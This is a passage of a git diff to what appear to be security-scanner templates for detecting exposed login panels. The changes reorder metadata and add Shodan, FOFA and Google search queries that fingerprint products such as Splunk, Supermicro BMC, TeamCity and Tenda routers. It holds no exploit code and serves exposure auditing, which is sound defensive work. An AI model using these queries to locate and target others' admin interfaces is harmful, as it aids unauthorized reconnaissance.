+ product: sphider tags: edb,panel,sphider http: diff --git a/http/exposed-panels/sphinxonline-panel.yaml b/http/exposed-panels/sphinxonline-panel.yaml index 9bfe55ec32..8120fec5cb 100644 --- a/http/exposed-panels/sphinxonline-panel.yaml +++ b/http/exposed-panels/sphinxonline-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.lesphinx-developpement.fr/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Connection - SphinxOnline" - verified: true tags: panel,sphinxonline,login,detect http: diff --git a/http/exposed-panels/splunk-enterprise-panel.yaml b/http/exposed-panels/splunk-enterprise-panel.yaml index 1f07ac2f36..cfaf68a8a5 100644 --- a/http/exposed-panels/splunk-enterprise-panel.yaml +++ b/http/exposed-panels/splunk-enterprise-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: splunk - shodan-query: http.title:"Login - Splunk" vendor: splunk + product: splunk + shodan-query: + - http.title:"Login - Splunk" + - http.title:"login - splunk" + fofa-query: title="login - splunk" + google-query: intitle:"login - splunk" tags: panel,splunk http: diff --git a/http/exposed-panels/spotweb-login-panel.yaml b/http/exposed-panels/spotweb-login-panel.yaml index 630dbbd99a..946408cee0 100644 --- a/http/exposed-panels/spotweb-login-panel.yaml +++ b/http/exposed-panels/spotweb-login-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: spotweb - shodan-query: title:"SpotWeb - overview" - vendor: spotweb_project verified: true + max-request: 1 + vendor: spotweb_project + product: spotweb + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: panel,spotweb,detect,spotweb_project http: diff --git a/http/exposed-panels/sql-monitor.yaml b/http/exposed-panels/sql-monitor.yaml index 17c58d8f2f..f2592edf8f 100644 --- a/http/exposed-panels/sql-monitor.yaml +++ b/http/exposed-panels/sql-monitor.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:red-gate:sql_monitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sql_monitor - shodan-query: html:"SQL Monitor" vendor: red-gate + product: sql_monitor + shodan-query: + - html:"SQL Monitor" + - http.html:"sql monitor" + fofa-query: body="sql monitor" tags: panel,red-gate http: diff --git a/http/exposed-panels/sqlbuddy-panel.yaml b/http/exposed-panels/sqlbuddy-panel.yaml index cf88d39dc1..30fef03917 100644 --- a/http/exposed-panels/sqlbuddy-panel.yaml +++ b/http/exposed-panels/sqlbuddy-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"SQL Buddy" - verified: true tags: panel,sqlbuddy http: diff --git a/http/exposed-panels/squirrelmail-login.yaml b/http/exposed-panels/squirrelmail-login.yaml index c5a9fe4846..957ad9fc75 100644 --- a/http/exposed-panels/squirrelmail-login.yaml +++ b/http/exposed-panels/squirrelmail-login.yaml @@ -13,9 +13,14 @@ info: cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 4 - product: squirrelmail - shodan-query: title:"SquirrelMail" vendor: squirrelmail + product: squirrelmail + shodan-query: + - title:"SquirrelMail" + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: squirrelmail,edb,panel http: diff --git a/http/exposed-panels/sqwebmail-login-panel.yaml b/http/exposed-panels/sqwebmail-login-panel.yaml index fbe48f7624..77351e4588 100644 --- a/http/exposed-panels/sqwebmail-login-panel.yaml +++ b/http/exposed-panels/sqwebmail-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"SqWebMail" - verified: true tags: webmail,sqwebmail,panel http: diff --git a/http/exposed-panels/star-network-utility.yaml b/http/exposed-panels/star-network-utility.yaml index b43d275925..735c7481df 100644 --- a/http/exposed-panels/star-network-utility.yaml +++ b/http/exposed-panels/star-network-utility.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Network Utility" - verified: true tags: panel,utility http: diff --git a/http/exposed-panels/steve-login-panel.yaml b/http/exposed-panels/steve-login-panel.yaml index f2f1ddaf4e..6e289da95c 100644 --- a/http/exposed-panels/steve-login-panel.yaml +++ b/http/exposed-panels/steve-login-panel.yaml @@ -12,10 +12,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"SteVe - Steckdosenverwaltung" + verified: true max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" - verified: true + google-query: intitle:"SteVe - Steckdosenverwaltung" tags: panel,steve http: diff --git a/http/exposed-panels/storybook-panel.yaml b/http/exposed-panels/storybook-panel.yaml index 384ae280c0..b0ec104a9b 100644 --- a/http/exposed-panels/storybook-panel.yaml +++ b/http/exposed-panels/storybook-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"storybook" - verified: true tags: panel,storybook,workshop http: diff --git a/http/exposed-panels/strapi-documentation.yaml b/http/exposed-panels/strapi-documentation.yaml index 16974f8318..4a301b23d5 100644 --- a/http/exposed-panels/strapi-documentation.yaml +++ b/http/exposed-panels/strapi-documentation.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:node.js:*:*:* metadata: max-request: 2 - product: strapi vendor: strapi + product: strapi tags: strapi,panel http: diff --git a/http/exposed-panels/strapi-panel.yaml b/http/exposed-panels/strapi-panel.yaml index 7cba97e754..4f2de2c47b 100644 --- a/http/exposed-panels/strapi-panel.yaml +++ b/http/exposed-panels/strapi-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:node.js:*:*:* metadata: max-request: 1 - product: strapi vendor: strapi + product: strapi tags: panel,strapi,login http: diff --git a/http/exposed-panels/structurizr-panel.yaml b/http/exposed-panels/structurizr-panel.yaml index 0d44a0daef..fd6bd0131a 100644 --- a/http/exposed-panels/structurizr-panel.yaml +++ b/http/exposed-panels/structurizr-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 - vendor: structurizr - verified: true + fofa-query: icon_hash=1199592666 tags: panel,structurizr,detect http: diff --git a/http/exposed-panels/subrion-login.yaml b/http/exposed-panels/subrion-login.yaml index cbc5166ec1..130d7c4c22 100644 --- a/http/exposed-panels/subrion-login.yaml +++ b/http/exposed-panels/subrion-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: subrion vendor: intelliants + product: subrion tags: panel,subrion,intelliants http: diff --git a/http/exposed-panels/sugarcrm-panel.yaml b/http/exposed-panels/sugarcrm-panel.yaml index e8919880e9..a84d0307e6 100644 --- a/http/exposed-panels/sugarcrm-panel.yaml +++ b/http/exposed-panels/sugarcrm-panel.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: sugarcrm - shodan-query: http.title:sugarcrm vendor: sugarcrm + product: sugarcrm + shodan-query: + - http.title:sugarcrm + - http.html:"sugarcrm inc. all rights reserved" + google-query: + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" + fofa-query: + - title=sugarcrm + - body="sugarcrm inc. all rights reserved" tags: sugarcrm,panel http: diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index d6fd78b532..730a986c66 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:781922099 - verified: true tags: sunbird,panel,login http: diff --git a/http/exposed-panels/sungrow-logger1000-detect.yaml b/http/exposed-panels/sungrow-logger1000-detect.yaml index 016b7bf0ae..0bb9f309d9 100644 --- a/http/exposed-panels/sungrow-logger1000-detect.yaml +++ b/http/exposed-panels/sungrow-logger1000-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:logger html:"htmlWebpackPlugin.options.title" - verified: true tags: panel,logger1000,sungrow http: diff --git a/http/exposed-panels/superadmin-ui-panel.yaml b/http/exposed-panels/superadmin-ui-panel.yaml index c272a394dc..56481722ac 100644 --- a/http/exposed-panels/superadmin-ui-panel.yaml +++ b/http/exposed-panels/superadmin-ui-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Superadmin UI - 4myhealth" - verified: true tags: panel,superadmin http: diff --git a/http/exposed-panels/supermicro-bmc-panel.yaml b/http/exposed-panels/supermicro-bmc-panel.yaml index d0a29f610c..9acc6912ca 100644 --- a/http/exposed-panels/supermicro-bmc-panel.yaml +++ b/http/exposed-panels/supermicro-bmc-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Supermicro BMC Login" max-request: 1 shodan-query: http.title:"Supermicro BMC Login" + google-query: intitle:"Supermicro BMC Login" tags: panel,supermicro,bmc http: diff --git a/http/exposed-panels/superset-login.yaml b/http/exposed-panels/superset-login.yaml index e7f9d0dcd6..288214e66b 100644 --- a/http/exposed-panels/superset-login.yaml +++ b/http/exposed-panels/superset-login.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: superset - shodan-query: http.favicon.hash:1582430156 - vendor: apache verified: true + max-request: 2 + vendor: apache + product: superset + shodan-query: + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: panel,superset,apache http: diff --git a/http/exposed-panels/syfadis-xperience-panel.yaml b/http/exposed-panels/syfadis-xperience-panel.yaml index 73548e6a05..e27135cd65 100644 --- a/http/exposed-panels/syfadis-xperience-panel.yaml +++ b/http/exposed-panels/syfadis-xperience-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://syfadis.fr/xperience metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Syfadis Xperience" tags: panel,syfadis,login,detect diff --git a/http/exposed-panels/symantec/symantec-dlp-login.yaml b/http/exposed-panels/symantec/symantec-dlp-login.yaml index 5e776a1ed4..80a6a7ad4f 100644 --- a/http/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/http/exposed-panels/symantec/symantec-dlp-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:symantec:data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: data_loss_prevention - shodan-query: http.title:"Symantec Data Loss Prevention" vendor: symantec + product: data_loss_prevention + shodan-query: + - http.title:"Symantec Data Loss Prevention" + - http.title:"symantec data loss prevention" + fofa-query: title="symantec data loss prevention" + google-query: intitle:"symantec data loss prevention" tags: symantec,panel,login http: diff --git a/http/exposed-panels/symantec/symantec-epm-login.yaml b/http/exposed-panels/symantec/symantec-epm-login.yaml index 2ed08495fb..c79bc41997 100644 --- a/http/exposed-panels/symantec/symantec-epm-login.yaml +++ b/http/exposed-panels/symantec/symantec-epm-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:symantec:endpoint_protection_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: endpoint_protection_manager - shodan-query: http.title:"Symantec Endpoint Protection Manager" vendor: symantec + product: endpoint_protection_manager + shodan-query: + - http.title:"Symantec Endpoint Protection Manager" + - http.title:"symantec endpoint protection manager" + fofa-query: title="symantec endpoint protection manager" + google-query: intitle:"symantec endpoint protection manager" tags: symantec,panel,login http: diff --git a/http/exposed-panels/symantec/symantec-iam-console.yaml b/http/exposed-panels/symantec/symantec-iam-console.yaml index 7822e0add0..d0cb476885 100644 --- a/http/exposed-panels/symantec/symantec-iam-console.yaml +++ b/http/exposed-panels/symantec/symantec-iam-console.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:broadcom:symantec_identity_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: symantec_identity_manager vendor: broadcom + product: symantec_identity_manager tags: symantec,panel,login,broadcom http: diff --git a/http/exposed-panels/symantec/symantec-phishing-panel.yaml b/http/exposed-panels/symantec/symantec-phishing-panel.yaml index e44ddbe9e8..bffeceec99 100644 --- a/http/exposed-panels/symantec/symantec-phishing-panel.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-panel.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.broadcom.com/products/cybersecurity/email/phishing-readiness metadata: - max-request: 1 verified: true + max-request: 1 tags: symantec,panel,login self-contained: true diff --git a/http/exposed-panels/synapse-mobility-panel.yaml b/http/exposed-panels/synapse-mobility-panel.yaml index 7ce79d6d9c..384c0716d7 100644 --- a/http/exposed-panels/synapse-mobility-panel.yaml +++ b/http/exposed-panels/synapse-mobility-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Synapse Mobility Login" max-request: 1 shodan-query: http.title:"Synapse Mobility Login" + google-query: intitle:"Synapse Mobility Login" tags: panel,synapse http: diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml index 9fc266e421..79a2e5cb28 100644 --- a/http/exposed-panels/syncserver-panel.yaml +++ b/http/exposed-panels/syncserver-panel.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: syncserver_s650_firmware - shodan-query: html:"Symmetricom SyncServer" - vendor: microchip verified: true + max-request: 1 + vendor: microchip + product: syncserver_s650_firmware + shodan-query: + - html:"Symmetricom SyncServer" + - http.html:"symmetricom syncserver" + fofa-query: body="symmetricom syncserver" tags: panel,login,syncserver,symmetricom,detect,microchip http: diff --git a/http/exposed-panels/syncthru-web-service.yaml b/http/exposed-panels/syncthru-web-service.yaml index 8382af16ef..1ccf298c9b 100644 --- a/http/exposed-panels/syncthru-web-service.yaml +++ b/http/exposed-panels/syncthru-web-service.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:samsung:syncthru_web_service:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: syncthru_web_service - shodan-query: title:"SyncThru Web Service" - vendor: samsung verified: true + max-request: 1 + vendor: samsung + product: syncthru_web_service + shodan-query: + - title:"SyncThru Web Service" + - http.title:"syncthru web service" + fofa-query: title="syncthru web service" + google-query: intitle:"syncthru web service" tags: edb,panel,syncthru,printer,samsung http: diff --git a/http/exposed-panels/synopsys-coverity-panel.yaml b/http/exposed-panels/synopsys-coverity-panel.yaml index 331d4f798c..d9bb29f460 100644 --- a/http/exposed-panels/synopsys-coverity-panel.yaml +++ b/http/exposed-panels/synopsys-coverity-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.synopsys.com/software-integrity/security-testing/static-analysis-sast.html metadata: + verified: true max-request: 1 shodan-query: http.title:"Coverity" - verified: true tags: panel,coverity,synopsys http: diff --git a/http/exposed-panels/sysaid-panel.yaml b/http/exposed-panels/sysaid-panel.yaml index 45ad7655f5..554b09647d 100644 --- a/http/exposed-panels/sysaid-panel.yaml +++ b/http/exposed-panels/sysaid-panel.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: sysaid vendor: sysaid + product: sysaid + shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: panel,sysaid,helpdesk http: diff --git a/http/exposed-panels/tableau-panel.yaml b/http/exposed-panels/tableau-panel.yaml index fa81861354..73eca8c3a3 100644 --- a/http/exposed-panels/tableau-panel.yaml +++ b/http/exposed-panels/tableau-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Tableau-Python-Server" max-request: 1 + fofa-query: app="Tableau-Python-Server" tags: tableau,panel,python http: diff --git a/http/exposed-panels/tableau-service-manager.yaml b/http/exposed-panels/tableau-service-manager.yaml index 7eb5e798e8..3f63aceab1 100644 --- a/http/exposed-panels/tableau-service-manager.yaml +++ b/http/exposed-panels/tableau-service-manager.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tableausoftware:tableau_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tableau_server - shodan-query: title:"Login - Tableau Services Manager" - vendor: tableausoftware verified: true + max-request: 1 + vendor: tableausoftware + product: tableau_server + shodan-query: + - title:"Login - Tableau Services Manager" + - http.title:"login - tableau services manager" + fofa-query: title="login - tableau services manager" + google-query: intitle:"login - tableau services manager" tags: panel,tableau,tableausoftware http: diff --git a/http/exposed-panels/tailon-panel.yaml b/http/exposed-panels/tailon-panel.yaml index b3af4de5be..fd8c25ed44 100644 --- a/http/exposed-panels/tailon-panel.yaml +++ b/http/exposed-panels/tailon-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/gvalkov/tailon metadata: + verified: true max-request: 1 shodan-query: title:"tailon" - verified: true tags: panel,tailon,detect http: diff --git a/http/exposed-panels/tautulli-panel.yaml b/http/exposed-panels/tautulli-panel.yaml index e4675fdf12..a3da3361ac 100644 --- a/http/exposed-panels/tautulli-panel.yaml +++ b/http/exposed-panels/tautulli-panel.yaml @@ -12,11 +12,20 @@ info: classification: cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: tautulli - shodan-query: title:"TAUTULLI" - vendor: tautulli verified: true + max-request: 2 + vendor: tautulli + product: tautulli + shodan-query: + - title:"TAUTULLI" + - http.title:"tautulli" + - http.title:"tautulli - home" + fofa-query: + - title="tautulli - home" + - title="tautulli" + google-query: + - intitle:"tautulli" + - intitle:"tautulli - home" tags: panel,tautulli,detect http: diff --git a/http/exposed-panels/teamcity-login-panel.yaml b/http/exposed-panels/teamcity-login-panel.yaml index 44727bf827..3281b74ce3 100644 --- a/http/exposed-panels/teamcity-login-panel.yaml +++ b/http/exposed-panels/teamcity-login-panel.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: teamcity - shodan-query: http.component:"TeamCity" - vendor: jetbrains verified: true + max-request: 1 + vendor: jetbrains + product: teamcity + shodan-query: + - http.component:"TeamCity" + - http.title:teamcity + - http.component:"teamcity" + fofa-query: title=teamcity + google-query: intitle:teamcity tags: panel,teamcity,jetbrains,detect http: diff --git a/http/exposed-panels/teamforge-panel.yaml b/http/exposed-panels/teamforge-panel.yaml index c06f49f105..40adbb7d9b 100644 --- a/http/exposed-panels/teamforge-panel.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -9,10 +9,10 @@ info: reference: - https://digital.ai/products/teamforge/ metadata: - shodan-query: title:"TeamForge :" - fofa-query: title="TeamForge :" verified: true max-request: 1 + shodan-query: title:"TeamForge :" + fofa-query: title="TeamForge :" tags: panel,teamforge,login http: diff --git a/http/exposed-panels/teampass-panel.yaml b/http/exposed-panels/teampass-panel.yaml index 1a252bd95c..0392f49f41 100644 --- a/http/exposed-panels/teampass-panel.yaml +++ b/http/exposed-panels/teampass-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: teampass product: teampass shodan-query: http.html:"teampass" - vendor: teampass - verified: true + fofa-query: body="teampass" tags: panel,teampass http: diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index 680c76f60e..b7b4c178ec 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tekton" - verified: true tags: panel,tekton,exposure http: diff --git a/http/exposed-panels/telerik-server-login.yaml b/http/exposed-panels/telerik-server-login.yaml index 7c9413b9e6..8bb8ba7907 100644 --- a/http/exposed-panels/telerik-server-login.yaml +++ b/http/exposed-panels/telerik-server-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Telerik Report Server" - verified: true tags: telerik,panel http: diff --git a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml index e95227938e..da8a6188d4 100644 --- a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml +++ b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tlr-2005ksh_firmware - shodan-query: http.html:"TLR-2005KSH" - vendor: telesquare verified: true + max-request: 1 + vendor: telesquare + product: tlr-2005ksh_firmware + shodan-query: + - http.html:"TLR-2005KSH" + - http.html:"tlr-2005ksh" + fofa-query: body="tlr-2005ksh" tags: panel,router,telesquare http: diff --git a/http/exposed-panels/teltonika-login.yaml b/http/exposed-panels/teltonika-login.yaml index 8915768bb9..6726e04a7c 100644 --- a/http/exposed-panels/teltonika-login.yaml +++ b/http/exposed-panels/teltonika-login.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" max-request: 1 + google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" tags: panel,teltonika,edb http: diff --git a/http/exposed-panels/tembosocial-panel.yaml b/http/exposed-panels/tembosocial-panel.yaml index b955157ccf..305d96579b 100644 --- a/http/exposed-panels/tembosocial-panel.yaml +++ b/http/exposed-panels/tembosocial-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"TemboSocial Administration" - verified: true tags: panel,tembosocial http: diff --git a/http/exposed-panels/tenda-11n-wireless-router-login.yaml b/http/exposed-panels/tenda-11n-wireless-router-login.yaml index d895127329..46cabbe02b 100644 --- a/http/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/http/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-668 metadata: - google-query: intitle:"Tenda 11N Wireless Router Login Screen" max-request: 1 shodan-query: http.title:"Tenda 11N Wireless Router Login Screen" + google-query: intitle:"Tenda 11N Wireless Router Login Screen" tags: panel,tenda http: diff --git a/http/exposed-panels/tenda-web-master.yaml b/http/exposed-panels/tenda-web-master.yaml index 42ecfaeb71..625c826a59 100644 --- a/http/exposed-panels/tenda-web-master.yaml +++ b/http/exposed-panels/tenda-web-master.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tenda Web Master" - verified: true tags: panel,tenda,router http: diff --git a/http/exposed-panels/teradek-panel.yaml b/http/exposed-panels/teradek-panel.yaml index 59bea7e246..401127fe24 100644 --- a/http/exposed-panels/teradek-panel.yaml +++ b/http/exposed-panels/teradek-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=612496907587499&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Teradek Cube Administrative Console" - verified: true tags: panel,login,teradek http: diff --git a/http/exposed-panels/teradici-pcoip-panel.yaml b/http/exposed-panels/teradici-pcoip-panel.yaml index 80579ba619..8ac72f1488 100644 --- a/http/exposed-panels/teradici-pcoip-panel.yaml +++ b/http/exposed-panels/teradici-pcoip-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:teradici:pcoip_client:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: pcoip_client vendor: teradici + product: pcoip_client tags: panel,teradici,pcoip http: diff --git a/http/exposed-panels/terraform-enterprise-panel.yaml b/http/exposed-panels/terraform-enterprise-panel.yaml index 13b861163b..36a9af504e 100644 --- a/http/exposed-panels/terraform-enterprise-panel.yaml +++ b/http/exposed-panels/terraform-enterprise-panel.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hashicorp:terraform:*:*:*:*:-:*:*:* metadata: - google-query: intitle:"Terraform Enterprise" max-request: 1 - product: terraform - shodan-query: title:"Terraform Enterprise" vendor: hashicorp + product: terraform + shodan-query: + - title:"Terraform Enterprise" + - http.title:"terraform enterprise" + google-query: + - intitle:"Terraform Enterprise" + - intitle:"terraform enterprise" + fofa-query: title="terraform enterprise" tags: panel,terraform,hashicorp http: diff --git a/http/exposed-panels/thinfinity-virtualui-panel.yaml b/http/exposed-panels/thinfinity-virtualui-panel.yaml index f1de282af3..1c4b607c50 100644 --- a/http/exposed-panels/thinfinity-virtualui-panel.yaml +++ b/http/exposed-panels/thinfinity-virtualui-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: thinfinity_virtualui - shodan-query: http.title:"Thinfinity VirtualUI" vendor: cybelesoft + product: thinfinity_virtualui + shodan-query: + - http.title:"Thinfinity VirtualUI" + - http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: panel,thinfinity,virtualui,cybelesoft http: diff --git a/http/exposed-panels/thruk-login.yaml b/http/exposed-panels/thruk-login.yaml index 8d1e82a9e6..4cc0ed7bfe 100644 --- a/http/exposed-panels/thruk-login.yaml +++ b/http/exposed-panels/thruk-login.yaml @@ -10,10 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:thruk:thruk:*:*:*:*:*:*:*:* metadata: - fofa-query: title=="Thruk Monitoring Webinterface" max-request: 1 - product: thruk vendor: thruk + product: thruk + fofa-query: + - title=="Thruk Monitoring Webinterface" + - title=="thruk monitoring webinterface" + - body="thruk" + shodan-query: http.html:"thruk" tags: thruk,panel http: diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml index ae2a893693..c2437e9ce6 100644 --- a/http/exposed-panels/tibco-spotfire-panel.yaml +++ b/http/exposed-panels/tibco-spotfire-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.tibco.com/products/tibco-spotfire metadata: verified: true - max-request: 1 + max-request: 2 shodan-query: "TIBCO Spotfire Server" tags: panel,tibco,login,detect diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index 505fcfd416..31a75a8139 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Tigase XMPP Server" - verified: true tags: tigase,xmpp,server,panel,exposure http: diff --git a/http/exposed-panels/tikiwiki-cms.yaml b/http/exposed-panels/tikiwiki-cms.yaml index 13eedadfc6..15ba93ed3a 100644 --- a/http/exposed-panels/tikiwiki-cms.yaml +++ b/http/exposed-panels/tikiwiki-cms.yaml @@ -11,8 +11,10 @@ info: cpe: 